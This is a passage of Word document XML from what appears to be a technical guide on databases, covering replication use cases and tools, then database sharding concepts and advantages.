      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Replication involves transmitting data over the network, which can lead to increased network traffic and affect performance, especially in large datasets or high-frequency updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA1ED3" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common Use Cases for Database Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DD5460" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Distribute read operations across multiple replicas to balance the load and improve response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FACAE7" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disaster Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that a replica is available in a different geographic location for quick recovery in case of a primary database failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E46EC90" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Synchronization Across Regions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Keep data synchronized across multiple data centers or cloud regions to provide low-latency access for users in different locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE38B0" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Analytics and Reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use replicas for running complex queries, analytics, and reporting without impacting the performance of the primary database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0192D4" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tools and Technologies for Database Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A8F28" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports various replication methods, including asynchronous, semi-synchronous, and group replication for high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102B796" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Offers streaming replication and logical replication, allowing for both real-time data replication and selective replication of specific tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049EF53" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses replica sets to provide high availability and automatic failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F2A53" w14:textId="77777777" w:rsidR="008414DE" w:rsidRPr="00DA2F32" w:rsidRDefault="008414DE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="394"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microsoft SQL Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides different replication options, such as transactional, merge, and snapshot replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7790CE" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161274CE" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc178383308"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is database sharding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="70A4A995" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technique used to horizontally partition data across multiple databases or servers, allowing for greater scalability, improved performance, and better management of large datasets. Each partition, known as a "shard," contains a subset of the total data and operates as an independent database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AAF10" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of Database Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAF56B" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Horizontal Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5E668" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In sharding, data is split across multiple databases (shards) based on a key, such as user ID, geographic location, or other criteria. Each shard holds a portion of the data rather than duplicating all data across each shard (which would be the case in replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F50A22" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shard Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279298FD" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The shard key is a specific column or set of columns used to determine how the data is partitioned. The choice of shard key is crucial as it affects the distribution of data, the performance of queries, and the ability to scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03E532" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shard Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C8D5A" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shard mapping refers to the mechanism that determines which shard a particular piece of data resides in, based on the shard key. This mapping can be simple (e.g., based on ranges) or more complex (e.g., using a hash function).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63477588" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Shard Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4774D951" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="395"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>As the system grows, data might not be evenly distributed across shards. Shard balancing involves redistributing data to ensure that each shard holds a similar amount of data and workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C1DC61" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advantages of Database Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70305AEA" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CAF82" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sharding allows a database to scale horizontally. As the data grows, you can add more shards to accommodate the increased volume without impacting performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0985C24E" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7BE707" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By distributing data across multiple shards, each individual shard has less data to process, which can lead to faster query execution times, especially for read and write-heavy applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5AD655" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fault Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD25D0" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="396"/>
